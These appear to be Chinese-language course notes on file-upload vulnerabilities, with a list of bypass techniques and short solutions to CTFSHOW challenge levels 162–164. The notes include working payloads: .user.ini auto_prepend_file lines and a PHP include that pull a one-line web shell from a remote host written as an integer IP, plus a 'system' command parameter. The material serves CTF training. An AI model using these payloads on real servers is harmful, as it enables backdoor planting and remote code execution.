1、文件上传-二次渲染
2、文件上传-简单免杀变异
3、文件上传-.htaccess妙用
4、文件上传-PHP语言特性
#详细点:
1、检测层面:前端,后端等
2、检测内容:文件头,完整性,二次渲染等
3、检测后缀:黑名单,白名单,MIME检测等
4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等
#本章课程内容:
1、文件上传-CTF赛题知识点
2、文件上传-中间件解析&编辑器安全
3、文件上传-实例CMS文件上传安全分析
#前置:
后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)
如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门
如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess
文件二次渲染:
1、判断上传前和上传后的文件大小及内容
2、判断上传后的文件返回数据包内容
CTFSHOW-文件上传-162到170关卡
162 突破.过滤
过滤 . () {} ; 等
利用远程包含IP转换地址(长地址后门)调用执行
.user.ini auto_prepend_file=png
png <?=include’http://794750069/'> //这里的http://794750069/是一个包含一句话木马的网页
https://www.bejson.com/convert/ip2int/
163 突破上传删除
过滤 . () {} ; 等 同时文件被删除
这里有两种情况:
1.直接全部都删除,这种就只能通过条件竞争(即通过快速访问文件,让文件的进程被占用,导致无法删除)
2.根据过滤来删除 这种就可以通过,直接通过.user,ini 直接远程包含 来绕过。
直接利用.user.ini包含远程
auto_prepend_file=http://794750069/
auto_prepend_file=http://794750069/
164 png二次渲染
https://blog.youkuaiyun.com/qq_40800734/article/details/105920149
get 0=system